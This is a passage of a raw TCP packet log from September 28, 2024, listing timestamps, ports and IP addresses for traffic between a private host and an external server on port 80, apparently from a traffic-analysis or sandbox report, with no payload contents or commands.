Sep 28, 2024 07:32:05.419044018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419070005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419080019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419105053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419125080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419214964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419231892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419243097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419253111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419265032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419265985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419285059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419310093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419445992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419457912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419497967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419564962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419575930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419585943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419595957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419605970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419619083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419648886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419847965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419857979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419867992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419878006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419888020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419898033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419898987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419912100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419923067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.419925928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419945002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.419976950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420258999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420269966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420279026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420289993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420300961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420310974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420310974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420361042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420361042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420557022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420567989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420578003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420588017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420598030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420608044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420608997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420619011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420629025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420629978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.420649052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.420676947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.423038960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423049927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423058987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423109055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.423156023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423166990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423177004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423187017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423206091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.423233032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.423316956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.423367023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465316057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465331078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465342999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465394020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465404034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465413094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465424061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465559006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465657949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465657949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465687037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465702057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465712070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465722084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465730906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465740919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465750933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465837002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465837002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465837002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.465931892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.465979099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466006994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466017962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466027975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466037989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466058969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466088057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466228962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466239929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466248035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466259003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466279030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466295004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466377020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466387987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466401100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466415882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466428995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466433048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466444016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466444016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466456890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466465950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466475010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466476917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466490030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466510057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466533899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466948986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466959953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466969013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466979027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466989040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.466996908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.466998100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467020988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467039108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467215061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467226028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467235088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467243910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467261076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467262983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467272043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467281103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467291117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467294931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467303038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467314005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467322111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467349052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467791080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467801094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467809916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467819929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467828989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467839003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467840910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467850924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.467860937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467881918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.467896938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468079090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468089104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468097925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468107939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468122959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468132973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468132973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468143940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468153954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468163013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468188047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468220949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468233109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468240976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468250990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468261003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468271017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468271017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468281031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468286037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468291998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468302965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.468308926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468319893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.468353033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.506719112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506752014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506762981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506809950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.506908894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506921053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506931067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506947041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.506983995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.506983995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.506983995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507005930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507040024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507050991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507061005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507086992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507112026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507198095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507210016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507220030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507230997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507252932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507281065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507333994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507380009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507431030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507441998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507452011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507462025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507472038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507482052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507491112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507527113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507764101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507775068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507816076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507921934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507932901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507941961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507951975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507962942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507973909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507978916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.507985115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507994890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.507997990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.508006096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508028984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.508045912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.508316040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508327007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508337975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508347034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508358002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.508372068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.508404016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510675907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510724068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510734081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510734081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510775089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510791063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510808945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510818958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510855913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510922909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510934114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510943890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.510977983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.510992050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553055048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553112030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553145885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553177118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553205013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553219080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553219080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553256035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553277969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553311110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553339958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553364992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553383112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553415060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553446054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553463936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553467035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553483009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553497076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553519011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553522110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553534031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553545952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553549051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553565025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553576946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553591013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553592920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553606033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553616047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553621054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553637981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553639889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553663969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553700924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553858042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553869963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553879976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.553914070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.553941011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554014921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554025888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554035902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554052114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554063082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554071903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554074049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554084063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554094076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554105043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554110050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554116011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554127932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554131031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554152012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554172039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554538965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554591894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554745913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554757118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554766893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554785013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554795980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554800034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554809093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554821014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554827929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554832935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554846048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554856062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554866076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554872036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554877043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554886103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554896116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554896116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554908037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554919004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554922104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554930925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554938078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554943085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.554966927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.554997921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:05.555669069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555680037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:05.555691004 CEST	80	49730	185.215.113.37	192.168.2.4
